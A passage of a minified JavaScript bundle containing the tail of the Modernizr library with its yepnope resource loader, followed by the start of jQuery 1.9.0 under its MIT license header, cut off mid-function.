e=t.createElement("div");return e.innerHTML="<svg/>",(e.firstChild&&e.firstChild.namespaceURI)==y.svg},b.svgclippaths=function(){return!!t.createElementNS&&/SVGClipPath/.test(m.call(t.createElementNS(y.svg,"clipPath")))};for(var A in b)L(b,A)&&(T=A.toLowerCase(),f[T]=b[A](),S.push((f[T]?"":"no-")+T));return f.addTest=function(e,t){if(typeof e=="object")for(var r in e)L(e,r)&&f.addTest(r,e[r]);else{e=e.toLowerCase();if(f[e]!==n)return f;t=typeof t=="function"?t():t,typeof l!="undefined"&&l&&(c.className+=" "+(t?"":"no-")+e),f[e]=t}return f},r(""),p=v=null,function(e,t){function n(e,t){var n=e.createElement("p"),r=e.getElementsByTagName("head")[0]||e.documentElement;return n.innerHTML="x<style>"+t+"</style>",r.insertBefore(n.lastChild,r.firstChild)}function r(){var e=g.elements;return typeof e=="string"?e.split(" "):e}function i(e){var t=v[e[p]];return t||(t={},d++,e[p]=d,v[d]=t),t}function s(e,n,r){n||(n=t);if(m)return n.createElement(e);r||(r=i(n));var s;return r.cache[e]?s=r.cache[e].cloneNode():c.test(e)?s=(r.cache[e]=r.createElem(e)).cloneNode():s=r.createElem(e),s.canHaveChildren&&!l.test(e)?r.frag.appendChild(s):s}function o(e,n){e||(e=t);if(m)return e.createDocumentFragment();n=n||i(e);var s=n.frag.cloneNode(),o=0,u=r(),a=u.length;for(;o<a;o++)s.createElement(u[o]);return s}function u(e,t){t.cache||(t.cache={},t.createElem=e.createElement,t.createFrag=e.createDocumentFragment,t.frag=t.createFrag()),e.createElement=function(n){return g.shivMethods?s(n,e,t):t.createElem(n)},e.createDocumentFragment=Function("h,f","return function(){var n=f.cloneNode(),c=n.createElement;h.shivMethods&&("+r().join().replace(/\w+/g,function(e){return t.createElem(e),t.frag.createElement(e),'c("'+e+'")'})+");return n}")(g,t.frag)}function a(e){e||(e=t);var r=i(e);return g.shivCSS&&!h&&!r.hasCSS&&(r.hasCSS=!!n(e,"article,aside,figcaption,figure,footer,header,hgroup,nav,section{display:block}mark{background:#FF0;color:#000}")),m||u(e,r),e}var f=e.html5||{},l=/^<|^(?:button|map|select|textarea|object|iframe|option|optgroup)$/i,c=/^(?:a|b|code|div|fieldset|h1|h2|h3|h4|h5|h6|i|label|li|ol|p|q|span|strong|style|table|tbody|td|th|tr|ul)$/i,h,p="_html5shiv",d=0,v={},m;(function(){try{var e=t.createElement("a");e.innerHTML="<xyz></xyz>",h="hidden"in e,m=e.childNodes.length==1||function(){t.createElement("a");var e=t.createDocumentFragment();return typeof e.cloneNode=="undefined"||typeof e.createDocumentFragment=="undefined"||typeof e.createElement=="undefined"}()}catch(n){h=!0,m=!0}})();var g={elements:f.elements||"abbr article aside audio bdi canvas data datalist details figcaption figure footer header hgroup mark meter nav output progress section summary time video",shivCSS:f.shivCSS!==!1,supportsUnknownElements:m,shivMethods:f.shivMethods!==!1,type:"default",shivDocument:a,createElement:s,createDocumentFragment:o};e.html5=g,a(t)}(this,t),f._version=a,f._prefixes=g,f.mq=C,f.testStyles=N,c.className=c.className.replace(/(^|\s)no-js(\s|$)/,"$1$2")+(l?" js "+S.join(" "):""),f}(this,this.document),function(e,t,n){function r(e){return"[object Function]"==d.call(e)}function i(e){return"string"==typeof e}function s(){}function o(e){return!e||"loaded"==e||"complete"==e||"uninitialized"==e}function u(){var e=v.shift();m=1,e?e.t?h(function(){("c"==e.t?k.injectCss:k.injectJs)(e.s,0,e.a,e.x,e.e,1)},0):(e(),u()):m=0}function a(e,n,r,i,s,a,f){function l(t){if(!d&&o(c.readyState)&&(w.r=d=1,!m&&u(),c.onload=c.onreadystatechange=null,t)){"img"!=e&&h(function(){b.removeChild(c)},50);for(var r in T[n])T[n].hasOwnProperty(r)&&T[n][r].onload()}}var f=f||k.errorTimeout,c=t.createElement(e),d=0,g=0,w={t:r,s:n,e:s,a:a,x:f};1===T[n]&&(g=1,T[n]=[]),"object"==e?c.data=n:(c.src=n,c.type=e),c.width=c.height="0",c.onerror=c.onload=c.onreadystatechange=function(){l.call(this,g)},v.splice(i,0,w),"img"!=e&&(g||2===T[n]?(b.insertBefore(c,y?null:p),h(l,f)):T[n].push(c))}function f(e,t,n,r,s){return m=0,t=t||"j",i(e)?a("c"==t?E:w,e,t,this.i++,n,r,s):(v.splice(this.i++,0,e),1==v.length&&u()),this}function l(){var e=k;return e.loader={load:f,i:0},e}var c=t.documentElement,h=e.setTimeout,p=t.getElementsByTagName("script")[0],d={}.toString,v=[],m=0,g="MozAppearance"in c.style,y=g&&!!t.createRange().compareNode,b=y?c:p.parentNode,c=e.opera&&"[object Opera]"==d.call(e.opera),c=!!t.attachEvent&&!c,w=g?"object":c?"script":"img",E=c?"script":w,S=Array.isArray||function(e){return"[object Array]"==d.call(e)},x=[],T={},N={timeout:function(e,t){return t.length&&(e.timeout=t[0]),e}},C,k;k=function(e){function t(e){var e=e.split("!"),t=x.length,n=e.pop(),r=e.length,n={url:n,origUrl:n,prefixes:e},i,s,o;for(s=0;s<r;s++)o=e[s].split("="),(i=N[o.shift()])&&(n=i(n,o));for(s=0;s<t;s++)n=x[s](n);return n}function o(e,i,s,o,u){var a=t(e),f=a.autoCallback;a.url.split(".").pop().split("?").shift(),a.bypass||(i&&(i=r(i)?i:i[e]||i[o]||i[e.split("/").pop().split("?")[0]]),a.instead?a.instead(e,i,s,o,u):(T[a.url]?a.noexec=!0:T[a.url]=1,s.load(a.url,a.forceCSS||!a.forceJS&&"css"==a.url.split(".").pop().split("?").shift()?"c":n,a.noexec,a.attrs,a.timeout),(r(i)||r(f))&&s.load(function(){l(),i&&i(a.origUrl,u,o),f&&f(a.origUrl,u,o),T[a.url]=2})))}function u(e,t){function n(e,n){if(e){if(i(e))n||(f=function(){var e=[].slice.call(arguments);l.apply(this,e),c()}),o(e,f,t,0,u);else if(Object(e)===e)for(p in h=function(){var t=0,n;for(n in e)e.hasOwnProperty(n)&&t++;return t}(),e)e.hasOwnProperty(p)&&(!n&&!--h&&(r(f)?f=function(){var e=[].slice.call(arguments);l.apply(this,e),c()}:f[p]=function(e){return function(){var t=[].slice.call(arguments);e&&e.apply(this,t),c()}}(l[p])),o(e[p],f,t,p,u))}else!n&&c()}var u=!!e.test,a=e.load||e.both,f=e.callback||s,l=f,c=e.complete||s,h,p;n(u?e.yep:e.nope,!!a),a&&n(a)}var a,f,c=this.yepnope.loader;if(i(e))o(e,0,c,0);else if(S(e))for(a=0;a<e.length;a++)f=e[a],i(f)?o(f,0,c,0):S(f)?k(f):Object(f)===f&&u(f,c);else Object(e)===e&&u(e,c)},k.addPrefix=function(e,t){N[e]=t},k.addFilter=function(e){x.push(e)},k.errorTimeout=1e4,null==t.readyState&&t.addEventListener&&(t.readyState="loading",t.addEventListener("DOMContentLoaded",C=function(){t.removeEventListener("DOMContentLoaded",C,0),t.readyState="complete"},0)),e.yepnope=l(),e.yepnope.executeStack=u,e.yepnope.injectJs=function(e,n,r,i,a,f){var l=t.createElement("script"),c,d,i=i||k.errorTimeout;l.src=e;for(d in r)l.setAttribute(d,r[d]);n=f?u:n||s,l.onreadystatechange=l.onload=function(){!c&&o(l.readyState)&&(c=1,n(),l.onload=l.onreadystatechange=null)},h(function(){c||(c=1,n(1))},i),a?l.onload():p.parentNode.insertBefore(l,p)},e.yepnope.injectCss=function(e,n,r,i,o,a){var i=t.createElement("link"),f,n=a?u:n||s;i.href=e,i.rel="stylesheet",i.type="text/css";for(f in r)i.setAttribute(f,r[f]);o||(p.parentNode.insertBefore(i,p),h(n,0))}}(this,document),Modernizr.load=function(){yepnope.apply(window,[].slice.call(arguments,0))},Modernizr.addTest("ie8compat",function(){return!window.addEventListener&&document.documentMode&&document.documentMode===7}); /*! * jQuery JavaScript Library v1.9.0 * http://jquery.com/ * * Includes Sizzle.js * http://sizzlejs.com/ * * Copyright 2005, 2012 jQuery Foundation, Inc. and other contributors * Released under the MIT license * http://jquery.org/license * * Date: 2013-1-14 */ (function(e,t){"use strict";function _(e){var t=e.length,n=y.type(e);return y.isWindow(e)?!1:e.nodeType===1&&t?!0:n==="array"||n!=="function"&&(t===0||typeof t=="number"&&t>0&&t-1 in e)}function P(e){var t=D[e]={};return y.each(e.match(w)||[],function(e,n){t[n]=!0}),t}function j(e,n,r,i){if(!y.acceptData(e))return;var s,o,u=y.expando,a=typeof n=="string",l=e.nodeType,c=l?y.cache:e,h=l?e[u]:e[u]&&u;if((!h||!c[h]||!i&&!c[h].data)&&a&&r===t)return;h||(l?e[u]=h=f.pop()||y.guid++:h=u),c[h]||(c[h]={},l||(c[h].toJSON=y.noop));if(typeof n=="object"||typeof n=="function")i?c[h]=y.extend(c[h],n):c[h].data=y.extend(c[h].data,n);return s=c[h],i||(s.data||(s.data={}),s=s.data),r!==t&&(s[y.camelCase(n)]=r),a?(o=s[n],o==null&&(o=s[y.camelCase(n)])):o=s,o}function F(e,t,n){if(!y.acceptData(e))return;var r,i,s,o=e.nodeType,u=o?y.cache:e,a=o?e[y.expando]:y.expando;if(!u[a])return;if(t){r=n?u[a]:u[a].data;if(r){y.isArray(t)?t=t.concat(y.map(t,y.camelCase)):t in r?t=[t]:(t=y.camelCase(t),t in r?t=[t]:t=t.split(" "));for(i=0,s=t.length;i<s;i++)delete r[t[i]];if(!(n?q:y.isEmptyObject)(r))return}}if(!n){delete u[a].data;if(!q(u[a]))return}o?y.cleanData([e],!0):y.support.deleteExpando||u!=u.window?delete u[a]:u[a]=null}function I(e,n,r){if(r===t&&e.nodeType===1){var i="data-"+n.replace(B,"-$1").toLowerCase();r=e.getAttribute(i);if(typeof r=="string"){try{r=r==="true"?!0:r==="false"?!1:r==="null"?null:+r+""===r?+r:H.test(r)?y.parseJSON(r):r}catch(s){}y.data(e,n,r)}else r=t}return r}function q(e){var t;for(t in e){if(t==="data"&&y.isEmptyObject(e[t]))continue;if(t!=="toJSON")return!1}return!0}function nt(){return!0}function rt(){return!1}function ft(e,t){do e=e[t];while(e&&e.nodeType!==1);return e}function lt(e,t,n){t=t||0;if(y.isFunction(t))return y.grep(e,function(e,r){var i=!!t.call(e,r,e);return i===n});if(t.nodeType)return y.grep(e,function(e){return e===t===n});if(typeof t=="string"){var r=y.grep(e,function(e){return e.nodeType===1});if(ot.test(t))return y.filter(t,r,!n);t=y.filter(t,r)}return y.grep(e,function(e){return y.inArray(e,t)>=0===n})}function ct(e){var t=ht.split("|"),n=e.createDocumentFragment();if(n.createElement)while(t.length)n.createElement(t.pop());return n}function At(e,t){return e.getElementsByTagName(t)[0]||e.appendChild(e.ownerDocument.createElement(t))}function Ot(e){var t=e.getAttributeNode("type");return e.type=(t&&t.specified)+"/"+e.type,e}function Mt(e){var t=Tt.exec(e.type);return t?e.type=t[1]:e.removeAttribute("type"),e}function _t(e,t){var n,r=0;for(;(n=e[r])!=null;r++)y._data(n,"globalEval",!t||y._data(t[r],"globalEval"))}function Dt(e,t){if(t.nodeType!==1||!y.hasData(e))return;var n,r,i,s=y._data(e),o=y._data(t,s),u=s.events;if(u){delete o.handle,o.events={};for(n in u)for(r=0,i=u[n].length;r<i;r++)y.event.add(t,n,u[n][r])}o.data&&(o.data=y.extend({},o.data))}function Pt(e,t){var n,r,i;if(t.nodeType!==1)return;n=t.nodeName.toLowerCase();if(!y.support.noCloneEvent&&t[y.expando]){r=y._data(t);for(i in r.events)y.removeEvent(t,i,r.handle);t.removeAttribute(y.expando)}if(n==="script"&&t.text!==e.text)Ot(t).text=e.text,Mt(t);else if(n==="object")t.parentNode&&(t.outerHTML=e.outerHTML),y.support.html5Clone&&e.innerHTML&&!y.trim(t.innerHTML)&&(t.innerHTML=e.innerHTML);else if(n==="input"&&Et.test(e.type))t.defaultChecked=t.checked=e.checked,t.value!==e.value&&(t.value=e.value);else if(n==="option")t.defaultSelected=t.selected=e.defaultSelected;else if(n==="input"||n==="textarea")t.defaultValue=e.defaultValue}function Ht(e,n){var r,i,s=0,o=typeof e.getElementsByTagName!="undefined"?e.getElementsByTagName(n||"*"):typeof e.querySelectorAll!="undefined"?e.querySelectorAll(n||"*"):t;if(!o)for(o=[],r=e.childNodes||e;(i=r[s])!=null;s++)!n||y.nodeName(i,n)?o.push(i):y.merge(o,Ht(i,n));return n===t||n&&y.nodeName(e,n)?y.merge([e],o):o}function Bt(e){Et.test(e.type)&&(e.defaultChecked=e.checked)}function Zt(e,t){if(t in e)return t;var n=t.charAt(0).toUpperCase()+t.slice(1),r=t,i=Yt.length;while(i--){t=Yt[i]+n;if(t in e)return t}return r}function en(e,t){return e=t||e,y.css(e,"display")==="none"||!y.contains(e.ownerDocument,e)}function tn(e,t){var n,r=[],i=0,s=e.length;for(;i<s;i++){n=e[i];if(!n.style)continue;r[i]=y._data(n,"olddisplay"),t?(!r[i]&&n.style.display==="none"&&(n.style.display=""),n.style.display===""&&en(n)&&(r[i]=y._data(n,"olddisplay",on(n.nodeName)))):!r[i]&&!en(n)&&y._data(n,"olddisplay",y.css(n,"display"))}for(i=0;i<s;i++){n=e[i];if(!n.style)continue;if(!t||n.style.display==="none"||n.style.display==="")n.style.display=t?r[i]||"":"none"}return e}function nn(e,t,n){var r=Xt.exec(t);return r?Math.max(0,r[1]-(n||0))+(r[2]||"px"):t}function rn(e,t,n,r,i){var s=n===(r?"border":"content")?4:t==="width"?1:0,o=0;for(;s<4;s+=2)n==="margin"&&(o+=y.css(e,n+Gt[s],!0,i)),r?(n==="content"&&(o-=y.css(e,"padding"+Gt[s],!0,i)),n!=="margin"&&(o-=y.css(e,"border"+Gt[s]+"Width",!0,i))):(o+=y.css(e,"padding"+Gt[s],!0,i),n!=="padding"&&(o+=y.css(e,"border"+Gt[s]+"Width",!0,i)));return o}function sn(e,t,n){var r=!0,i=t==="width"?e.offsetWidth:e.offsetHeight,s=Ft(e),o=y.support.boxSizing&&y.css(e,"boxSizing",!1,s)==="border-box";if(i<=0||i==null){i=jt(e,t,s);if(i<0||i==null)i=e.style[t];if(Vt.test(i))return i;r=o&&(y.support.boxSizingReliable||i===e.style[t]),i=parseFloat(i)||0}return i+rn(e,t,n||(o?"border":"content"),r,s)+"px"}function on(e){var t=i,n=Jt[e];if(!n){n=un(e,t);if(n==="none"||!n)It=(It||y("<iframe frameborder='0' width='0' height='0'/>").css("cssText","display:block !important")).appendTo(t.documentElement),t=(It[0].contentWindow||It[0].contentDocument).document,t.write("<!doctype html><html><body>"),t.close(),n=un(e,t),It.detach();Jt[e]=n}return n}function un(e,t){var n=y(t.createElement(e)).appendTo(t.body),r=y.css(n[0],"display");return n.remove(),r}function pn(e,t,n,r){var i;if(y.isArray(t))y.each(t,function(t,i){n||fn.test(e)?r(e,i):pn(e+"["+(typeof i=="object"?t:"")+"]",i,n,r)});else if(!n&&y.type(t)==="object")for(i in t)pn(e+"["+i+"]",t[i],n,r);else r(e,t)}function On(e){return function(t,n){typeof t!="string"&&(n=t,t="*");var r,i=0,s=t.toLowerCase().match(w)||[];if(y.isFunction(n))while(r=s[i++])r[0]==="+"?(r=r.slice(1)||"*",(e[r]=e[r]||[]).unshift(n)):(e[r]=e[r]||[]).push(n)}}function Mn(e,t,n,r){function o(u){var a;return i[u]=!0,y.each(e[u]||[],function(e,u){var f=u(t,n,r);if(typeof f=="string"&&!s&&!i[f])return t.dataTypes.unshift(f),o(f),!1;if(s)return!(a=f)}),a}var i={},s=e===kn;return o(t.dataTypes[0])||!i["*"]&&o("*")}function _n(e,n){var r,i,s=y.ajaxSettings.flatOptions||{};for(r in n)n[r]!==t&&((s[r]?e:i||(i={}))[r]=n[r]);return i&&y.extend(!0,e,i),e}function Dn(e,n,r){var i,s,o,u,a=e.contents,f=e.dataTypes,l=e.responseFields;for(s in l)s in r&&(n[l[s]]=r[s]);while(f[0]==="*")f.shift(),i===t&&(i=e.mimeType||n.getResponseHeader("Content-Type"));if(i)for(s in a)if(a[s]&&a[s].test(i)){f.unshift(s);break}if(f[0]in r)o=f[0];else{for(s in r){if(!f[0]||e.converters[s+" "+f[0]]){o=s;break}u||(u=s)}o=o||u}if(o)return o!==f[0]&&f.unshift(o),r[o]}function Pn(e,t){var n,r,i,s,o={},u=0,a=e.dataTypes.slice(),f=a[0];e.dataFilter&&(t=e.dataFilter(t,e.dataType));if(a[1])for(n in e.converters)o[n.toLowerCase()]=e.converters[n];for(;i=a[++u];)if(i!=="*"){if(f!=="*"&&f!==i){n=o[f+" "+i]||o["* "+i];if(!n)for(r in o){s=r.split(" ");if(s[1]===i){n=o[f+" "+s[0]]||o["* "+s[0]];if(n){n===!0?n=o[r]:o[r]!==!0&&(i=s[0],a.splice(u--,0,i));break}}}if(n!==!0)if(n&&e["throws"])t=n(t);else try{t=n(t)}catch(l){return{state:"parsererror",error:n?l:"No conversion from "+f+" to "+i}}}f=i}return{state:"success",data:t}}function Rn(){try{return new e.XMLHttpRequest}catch(t){}}function Un(){try{return new e.ActiveXObject("Microsoft.XMLHTTP")}catch(t){}}function Qn(){return setTimeout(function(){zn=t}),zn=y.now()}function Gn(e,t){y.each(t,function(t,n){var r=(Kn[t]||[]).concat(Kn["*"]),i=0,s=r.length;for(;i<s;i++)if(r[i].call(e,t,n))return})}function Yn(e,t,n){var r,i,s=0,o=Jn.length,u=y.Deferred().always(function(){delete a.elem}),a=function(){if(i)return!1;var t=zn||Qn(),n=Math.max(0,f.startTime+f.duration-t),r=n/f.duration||0,s=1-r,o=0,a=f.tweens.length;for(;o<a;o++)f.tweens[o].run(s);return u.notifyWith(e,[f,s,n]),s<1&&a?n:(u.resolveWith(e,[f]),!1)},f=u.promise({elem:e,props:y.extend({},t),opts:y.extend(!0,{specialEasing:{}},n),originalProperties:t,originalOptions:n,startTime:zn||Qn(),duration:n.duration,tweens:[],createTween:function(t,n){var r=y.Tween(e,f.opts,t,n,f.opts.specialEasing[t]||f.opts.easing);return f.tweens.push(r),r},stop:function(t){var n=0,r=t?f.tweens.length:0;if(i)return this;i=!0;for(;n<r;n++)f.tweens[n].run(1);return t?u.resolveWith(e,[f,t]):u.rejectWith(e,[f,t]),this}}),l=f.props;Zn(l,f.opts.specialEasing);for(;s<o;s++){r=Jn[s].call(f,e,l,f.opts);if(r)return r}return Gn(f,l),y.isFunction(f.opts.start)&&f.opts.start.call(e,f),y.fx.timer(y.extend(a,{elem:e,anim:f,queue:f.opts.queue})),f.progress(f.opts.progress).done(f.opts.done,f.opts.complete).fail(f.opts.fail).always(f.opts.always)}function Zn(e,t){var n,r,i,s,o;for(n in e){r=y.camelCase(n),i=t[r],s=e[n],y.isArray(s)&&(i=s[1],s=e[n]=s[0]),n!==r&&(e[r]=s,delete e[n]),o=y.cssHooks[r];if(o&&"expand"in o){s=o.expand(s),delete e[r];for(n in s)n in e||(e[n]=s[n],t[n]=i)}else t[r]=i}}function er(e,t,n){var r,i,s,o,u,a,f,l,c,h=this,p=e.style,d={},v=[],m=e.nodeType&&en(e);n.queue||(l=y._queueHooks(e,"fx"),l.unqueued==null&&(l.unqueued=0,c=l.empty.fire,l.empty.fire=function(){l.unqueued||c()}),l.unqueued++,h.always(function(){h.always(function(){l.unqueued--,y.queue(e,"fx").length||l.empty.fire()})})),e.nodeType===1&&("height"in t||"width"in t)&&(n.overflow=[p.overflow,p.overflowX,p.overflowY],y.css(e,"display")==="inline"&&y.css(e,"float")==="none"&&(!y.support.inlineBlockNeedsLayout||on(e.nodeName)==="inline"?p.display="inline-block":p.zoom=1)),n.overflow&&(p.overflow="hidden",y.support.shrinkWrapBlocks||h.done(function(){p.overflow=n.overflow[0],p.overflowX=n.overflow[1],p.overflowY=n.overflow[2]}));for(r in t){s=t[r];if(Xn.exec(s)){delete t[r],a=a||s==="toggle";if(s===(m?"hide":"show"))continue;v.push(r)}}o=v.length;if(o){u=y._data(e,"fxshow")||y._data(e,"fxshow",{}),"hidden"in u&&(m=u.hidden),a&&(u.hidden=!m),m?y(e).show():h.done(function(){y(e).hide()}),h.done(function(){var t;y._removeData(e,"fxshow");for(t in d)y.style(e,t,d[t])});for(r=0;r<o;r++)i=v[r],f=h.createTween(i,m?u[i]:0),d[i]=u[i]||y.style(e,i),i in u||(u[i]=f.start,m&&(f.end=f.start,f.start=i==="width"||i==="height"?1:0))}}function tr(e,t,n,r,i){return new tr.prototype.init(e,t,n,r,i)}function nr(e,t){var n,r={height:e},i=0;t=t?1:0;for(;i<4;i+=2-t)n=Gt[i],r["margin"+n]=r["padding"+n]=e;return t&&(r.opacity=r.width=e),r}function rr(e){return y.isWindow(e)?e:e.nodeType===9?e.defaultView||e.parentWindow:!1}var n,r,i=e.document,s=e.location,o=e.jQuery,u=e.$,a={},f=[],l="1.9.0",c=f.concat,h=f.push,p=f.slice,d=f.indexOf,v=a.toString,m=a.hasOwnProperty,g=l.trim,y=function(e,t){return new y.fn.init(e,t,n)},b=/[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source,w=/\S+/g,E=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,S=/^(?:(<[\w\W]+>)[^>]*|#([\w-]*))$/,x=/^<(\w+)\s*\/?>(?:<\/\1>|)$/,T=/^[\],:{}\s]*$/,N=/(?:^|:|,)(?:\s*\[)+/g,C=/\\(?:["\\\/bfnrt]|u[\da-fA-F]{4})/g,k=/"[^"\\\r\n]*"|true|false|null|-?(?:\d+\.|)\d+(?:[eE][+-]?\d+|)/g,L=/^-ms-/,A=/-([\da-z])/gi,O=function(e,t){return t.toUpperCase()},M=function(){i.addEventListener?(i.removeEventListener("DOMContentLoaded",M,!1),y.ready()):i.readyState==="complete"&&(i.detachEvent("onreadystatechange",M),y.ready())};y.fn=y.prototype={jquery:l,constructor:y,init:function(e,n,r){var s,o;if(!e)return this;if(typeof e=="string"){e.charAt(0)==="<"&&e.charAt(e.length-1)===">"&&e.length>=3?s=[null,e,null]:s=S.exec(e);if(s&&(s[1]||!n)){if(s[1]){n=n instanceof y?n[0]:n,y.merge(this,y.parseHTML(s[1],n&&n.nodeType?n.ownerDocument||n:i,!0));if(x.test(s[1])&&y.isPlainObject(n))for(s in n)y.isFunction(this[s])?this[s](n[s]):this.attr(s,n[s]);return this}o=i.getElementById(s[2]);if(o&&o.parentNode){if(o.id!==s[2])return r.find(e);this.length=1,this[0]=o}return this.context=i,this.selector=e,this}return!n||n.jquery?(n||r).find(e):this.constructor(n).find(e)}return e.nodeType?(this.context=this[0]=e,this.length=1,this):y.isFunction(e)?r.ready(e):(e.selector!==t&&(this.selector=e.selector,this.context=e.context),y.makeArray(e,this))},selector:"",length:0,size:function(){return this.length},toArray:function(){return p.call(this)},get:function(e){return e==null?this.toArray():e<0?this[this.length+e]:this[e]},pushStack:function(e){var t=y.merge(this.constructor(),e);return t.prevObject=this,t.context=this.context,t},each:function(e,t){return y.each(this,e,t)},ready:function(e){return y.ready.promise().done(e),this},slice:function(){return this.pushStack(p.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(n>=0&&n<t?[this[n]]:[])},map:function(e){return this.pushStack(y.map(this,function(t,n){return e.call(t,n,t)}))},end:function(){return this.prevObject||this.constructor(null)},push:h,sort:[].sort,splice:[].splice},y.fn.init.prototype=y.fn,y.extend=y.fn.extend=function(){var e,n,r,i,s,o,u=arguments[0]||{},a=1,f=arguments.length,l=!1;typeof u=="boolean"&&(l=u,u=arguments[1]||{},a=2),typeof u!="object"&&!y.isFunction(u)&&(u={}),f===a&&(u=this,--a);for(;a<f;a++)if((e=arguments[a])!=null)for(n in e){r=u[n],i=e[n];if(u===i)continue;l&&i&&(y.isPlainObject(i)||(s=y.isArray(i)))?(s?(s=!1,o=r&&y.isArray(r)?r:[]):o=r&&y.isPlainObject(r)?r:{},u[n]=y.extend(l,o,i)):i!==t&&(u[n]=i)}return u},y.extend({noConflict:function(t){return e.$===y&&(e.$=u),t&&e.jQuery===y&&(e.jQuery=o),y},isReady:!1,readyWait:1,holdReady:function(e){e?y.readyWait++:y.ready(!0)},ready:function(e){if(e===!0?--y.readyWait:y.isReady)return;if(!i.body)return setTimeout(y.ready);y.isReady=!0;if(e!==!0&&--y.readyWait>0)return;r.resolveWith(i,[y]),y.fn.trigger&&y(i).trigger("ready").off("ready")},isFunction:function(e){return y.type(e)==="function"},isArray:Array.isArray||function(e){return y.type(e)==="array"},isWindow:function(e){return e!=null&&e==e.window},isNumeric:function(e){return!isNaN(parseFloat(e))&&isFinite(e)},type:function(e){return e==null?String(e):typeof e=="object"||typeof e=="function"?a[v.call(e)]||"object":typeof e},isPlainObject:function(e){if(!e||y.type(e)!=="object"||e.nodeType||y.isWindow(e))return!1;try{if(e.constructor&&!m.call(e,"constructor")&&!m.call(e.constructor.prototype,"isPrototypeOf"))return!1}catch(n){return!1}var r;for(r in e);return r===t||m.call(e,r)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},error:function(e){throw new Error(e)},parseHTML:function(e,t,n){if(!e||typeof e!="string")return null;typeof t=="boolean"&&(n=t,t=!1),t=t||i;var r=x.exec(e),s=!n&&[];return r?[t.createElement(r[1])]:(r=y.buildFragment([e],t,s),s&&y(s).remove(),y.merge([],r.childNodes))},parseJSON:function(t){if(e.JSON&&e.JSON.parse)return e.JSON.parse(t);if(t===null)return t;if(typeof t=="string"){t=y.trim(t);if(t&&T.test(t.replace(C,"@").replace(k,"]").replace(N,"")))return(new Function("return "+t))()}y.error("Invalid JSON: "+t)},parseXML:function(n){var r,i;if(!n||typeof n!="string")return null;try{e.DOMParser?(i=new DOMParser,r=i.parseFromString(n,"text/xml")):(r=new ActiveXObject("Microsoft.XMLDOM"),r.async="false",r.loadXML(n))}catch(s){r=t}return(!r||!r.documentElement||r.getElementsByTagName("parsererror").length)&&y.error("Invalid XML: "+n),r},noop:function(){},globalEval:function(t){t&&y.trim(t)&&(e.execScript||function(t){e.eval.call(e,t)})(t)},camelCase:function(e){return e.replace(L,"ms-").replace(A,O)},nodeName:function(e,t){return e.nodeName&&e.nodeName.toLowerCase()===t.toLowerCase()},each:function(e,t,n){var r,i=0,s=e.length,o=_(e);if(n)if(o)for(;i<s;i++){r=t.apply(e[i],n);if(r===!1)break}else for(i in e){r=t.apply(e[i],n);if(r===!1)break}else if(o)for(;i<s;i++){r=t.call(e[i],i,e[i]);if(r===!1)break}else for(i in e){r=t.call(e[i],i,e[i]);if(r===!1)break}return e},trim:g&&!g.call(" ")?function(e){return e==null?"":g.call(e)}:function(e){return e==null?"":(e+"").replace(E,"")},makeArray:function(e,t){var n=t||[];return e!=null&&(_(Object(e))?y.merge(n,typeof e=="string"?[e]:e):h.call(n,e)),n},inArray:function(e,t,n){var r;if(t){if(d)return d.call(t,e,n);r=t.length,n=n?n<0?Math.max(0,r+n):n:0;for(;n<r;n++)if(n in t&&t[n]===e)return n}return-1},merge:function(e,n){var r=n.length,i=e.length,s=0;if(typeof r=="number")for(;s<r;s++)e[i++]=n[s];else while(n[s]!==t)e[i++]=n[s++];return e.length=i,e},grep:function(e,t,n){var r,i=[],s=0,o=e.length;n=!!n;for(;s<o;s++)r=!!t(e[s],s),n!==r&&i.push(e[s]);return i},map:function(e,t,n){var r,i=0,s=e.length,o=_(e),u=[];if(o)for(;i<s;i++)r=t(e[i],i,n),r!=null&&(u[u.length]=r);else for(i in e)r=t(e[i],i,n),r!=null&&(u[u.length]=r);return c.apply([],u)},guid:1,proxy:function(e,n){var r,i,s;return typeof n=="string"&&(r=e[n],n=e,e=r),y.isFunction(e)?(i=p.call(arguments,2),s=function(){return e.apply(n||this,i.concat(p.call(arguments)))},s.guid=e.guid=e.guid||y.guid++,s):t},access:function(e,n,r,i,s,o,u){var a=0,f=e.length,l=r==null;if(y.type(r)==="object"){s=!0;for(a in r)y.access(e,n,a,r[a],!0,o,u)}else if(i!==t){s=!0,y.isFunction(i)||(u=!0),l&&(u?(n.call(e,i),n=null):(l=n,n=function(e,t,n){return l.call(y(e),n)}));if(n)for(;a<f;a++)n(e[a],r,u?i:i.call(e[a],a,n(e[a],r)))}return s?e:l?n.call(e):f?n(e[0],r):o},now:function(){return(new Date).getTime()}}),y.ready.promise=function(t){if(!r){r=y.Deferred();if(i.readyState==="complete")setTimeout(y.ready);else if(i.addEventListener)i.addEventListener("DOMContentLoaded",M,!1),e.addEventListener("load",y.ready,!1);else{i.attachEvent("onreadystatechange",M),e.attachEvent("onload",y.ready);var n=!1;try{n=e.frameElement==null&&i.documentElement}catch(s){}n&&n.doScroll&&function o(){if(!y.isReady){try{n.doScroll("left")}catch(e){return setTimeout(o,50)}y.ready()}}()}}return r.promise(t)},y.each("Boolean Number String Function Array Date RegExp Object Error".split(" "),function(e,t){a["[object "+t+"]"]=t.toLowerCase()}),n=y(i);var D={};y.Callbacks=function(e){e=typeof e=="string"?D[e]||P(e):y.extend({},e);var n,r,i,s,o,u,a=[],f=!e.once&&[],l=function(t){n=e.memory&&t,r=!0,u=s||0,s=0,o=a.length,i=!0;for(;a&&u<o;u++)if(a[u].apply(t[0],t[1])===!1&&e.stopOnFalse){n=!1;break}i=!1,a&&(f?f.length&&l(f.shift()):n?a=[]:c.disable())},c={add:function(){if(a){var t=a.length;(function r(t){y.each(t,function(t,n){var i=y.type(n);i==="function"?(!e.unique||!c.has(n))&&a.push(n):n&&n.length&&i!=="string"&&r(n)})})(arguments),i?o=a.length:n&&(s=t,l(n))}return this},remove:function(){return a&&y.each(arguments,function(e,t){var n;while((n=y.inArray(t,a,n))>-1)a.splice(n,1),i&&(n<=o&&o--,n<=u&&u--)}),this},has:function(e){return y.inArray(e,a)>-1},empty:function(){return a=[],this},disable:function(){return a=f=n=t,this},disabled:function(){return!a},lock:function(){return f=t,n||c.disable(),this},locked:function(){return!f},fireWith:function(e,t){return 